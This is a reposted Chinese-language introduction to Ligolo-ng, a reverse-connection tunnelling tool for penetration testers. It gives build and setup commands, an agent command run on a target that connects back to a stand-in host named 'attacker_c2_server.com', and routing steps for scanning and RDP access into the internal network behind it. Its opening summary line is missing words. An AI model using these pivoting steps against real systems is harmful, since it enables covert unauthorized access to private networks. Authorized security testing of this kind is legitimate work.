摘要:是一款輕量級的快速工具,可以幫助廣大滲透測試人員利用反向連接建立一條隱蔽的通信信道,而且無需支持。在使用時,你應該使用或以避免假陽性。
Ligolo-ng是一款高級信道工具,該工具基于TUN接口實現其功能。Ligolo-ng是一款輕量級的快速工具,可以幫助廣大滲透測試人員利用反向TCP/TLS連接建立一條隱蔽的通信信道,而且無需SOCKS支持。
Tun接口(不再需要SOCKS);
簡單的UI界面,支持選擇代理和網絡信息;
易于使用,易于安裝;
基于Let’s Encrypt的自動化證書配置;
高性能(多路復用);
不需要高級權限;
套接字監聽/代理綁定;
多平臺代理支持;
構建Ligolo-ng
$ go build -o agent cmd/agent/main.go$ go build -o proxy cmd/proxy/main.go# Build agent for Windows$ GOOS=windows go build -o agent.exe cmd/agent/main.go
安裝Ligolo-ng
我們需要在自己的命令控制服務器上開啟代理服務,默認使用11601端口監聽:
$ sudo ip tuntap add user [your_username] mode tun ligolo$ sudo ip link set ligolo up$ ./proxy -h # Help options$ ./proxy -autocert # Automatically request LetsEncrypt certificates
首先,我們需要在目標設備上啟動代理(無需特殊權限):
$ ./agent -connect attacker_c2_server.com:11601
此時,代理服務器上將出現一條會話鏈接:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
使用“session”命令選擇代理:
ligolo-ng ? session? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
使用“ifconfig”命令顯示代理的網絡配置信息:
[Agent : nchatelain@nworkstation] ? ifconfig[...]┌─────────────────────────────────────────────┐│ Interface 3 │├──────────────┬──────────────────────────────┤│ Name │ wlp3s0 ││ Hardware MAC │ de:ad:be:ef:ca:fe ││ MTU │ 1500 ││ Flags │ up|broadcast|multicast ││ IPv4 Address │ 192.168.0.30/24 │└──────────────┴──────────────────────────────┘
在代理/中繼服務器上添加一條指向192.168.0.0/24代理網絡的路由:
$ sudo ip route add 192.168.0.0/24 dev ligolo
最后,在代理上開啟一條通信信道:
[Agent : nchatelain@nworkstation] ? start[Agent : nchatelain@nworkstation] ? INFO[0690] Starting tunnel to nchatelain@nworkstation
現在,你就可以通過代理服務器訪問192.168.0.0/24代理網絡:
$ nmap 192.168.0.0/24 -v -sV -n[...]$ rdesktop 192.168.0.123[...]
TCP
UDP
ICMP
在Ligolo-ng的幫助下,你可以輕松達到100 Mbits/秒的速度。下面給出的測試結果是在一臺200Mbits/s服務器上使用iperf測試的一條200Mbits/s的鏈接:
$ iperf3 -c 10.10.0.1 -p 24483Connecting to host 10.10.0.1, port 24483[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483[ ID] Interval Transfer Bitrate Retr Cwnd[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes [ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes - - - - - - - - - - - - - - - - - - - - - - - - -[ ID] Interval Transfer Bitrate Retr[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
由于代理并不是以高級權限運行的,因此無法轉發原始數據包。當你執行“NMAP SYN-SCAN”的時候,代理上會執行一次TCP connect()。
在使用Nmap時,你應該使用“–unprivileged”或“-PE”以避免假陽性。
文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。
轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/121222.html
摘要:宋體為了云計算的健康發展和等級保護工作在新形勢下順利推進,就不能忽視對云計算面臨的各類安全威脅的研究和分析,并制定和建立相應的等級保護政策技術體系,應對即將到來的云浪潮。 ? ? 為了云計算的健康發展和等級保護工作在新形勢下順利推進,就不能忽視對云計算面臨的各類安全威脅的研究和分析,并制定和建立相應的等級保護政策、技術體系,應對即將到來的云浪潮。在云環境中,除了傳統意義所面臨的各類安全威脅外...
閱讀 3234·2021-11-23 09:51
閱讀 2480·2021-09-27 13:34
閱讀 2464·2021-09-08 09:45
閱讀 661·2019-08-30 15:44
閱讀 3492·2019-08-29 12:17
閱讀 2759·2019-08-26 12:18
閱讀 2621·2019-08-26 10:10
閱讀 3077·2019-08-23 18:02